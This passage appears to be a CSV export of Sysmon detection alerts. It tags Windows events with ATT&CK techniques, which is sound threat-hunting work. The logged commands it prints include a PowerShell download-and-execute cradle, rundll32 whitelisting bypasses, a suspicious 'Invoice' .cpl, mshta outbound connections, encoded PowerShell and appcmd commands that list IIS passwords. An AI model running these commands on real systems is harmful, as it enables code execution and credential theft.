Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka105.inwitelecom.net ) , IP ( 105.73.6.105 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4132 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 06:58:40.721 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49705 + + false + 105.73.6.105 + aka105.inwitelecom.net + 80 + http + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1019 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 17:26:09.417 + 365ABB72-D7B1-5CE6-0000-00102CD76D00 + 2240 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + D:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-D7B0-5CE6-0000-001077C56D00 + 3388 + \\vboxsrv\HTools\msxsl.exe + msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application 
Whitelisting,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16392 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:59.727 + 365ABB72-20C7-5CD8-0000-001021022500 + 1416 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16392 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:59.727 + 365ABB72-20C7-5CD8-0000-001021022500 + 1416 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler 
file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16392 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:59.727 + 365ABB72-20C7-5CD8-0000-001021022500 + 1416 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557681649.458113,2019-05-12T21:20:49.458113+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C 
c:\Windows\system32\calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16513 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:20:49.261 + 365ABB72-55F1-5CD8-0000-0010781C3300 + 2392 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-55F1-5CD8-0000-00108A153300 + 3668 + C:\Windows\System32\ftp.exe + "C:\Windows\System32\ftp.exe" -s:c:\users\ieuser\appdata\local\temp\ftp.txt + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.063277,2019-05-27T05:29:19.063277+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5946 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.023 + 365ABB72-3D6F-5CEB-0000-0010A6B1FF00 + 1508 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + 
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4864 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.503 + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj 
",1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4864 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.503 + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4864 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.503 + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + 
Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1558452781.141798,2019-05-21T19:33:01.141798+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka112.inwitelecom.net ) , IP ( 105.73.6.112 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4131 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 06:58:40.518 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49704 + + false + 105.73.6.112 + aka112.inwitelecom.net + 80 + http + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.985 + 747F3D96-9F68-5E75-0000-001079652000 + 3300 + 
C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.985 + 747F3D96-9F68-5E75-0000-001079652000 + 3300 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] 
Rundll32 Execution detected,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.985 + 747F3D96-9F68-5E75-0000-001079652000 + 3300 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16391 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:37.063 + 365ABB72-20B1-5CD8-0000-001064D62400 + 1844 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 
365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16391 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:37.063 + 365ABB72-20B1-5CD8-0000-001064D62400 + 1844 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16391 + + + + + 
Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:37.063 + 365ABB72-20B1-5CD8-0000-001064D62400 + 1844 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.973148,2019-05-27T05:29:18.973148+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5943 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.933 + 365ABB72-3D6E-5CEB-0000-0010EFADFF00 + 2276 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 
365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969968.76308,2019-05-27T19:12:48.763080+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6184 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:48.644 + 365ABB72-FE70-5CEB-0000-0010385C0C00 + 2412 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436001.567754,2019-07-30T01:33:21.567754+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 93.184.220.29 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4908 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:19.687 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + 
C:\Windows\System32\mshta.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49827 + + false + 93.184.220.29 + + 80 + http + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.445 + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-60F5-5D3F-0000-0010A7B65500 + 4996 + C:\Windows\System32\control.exe + 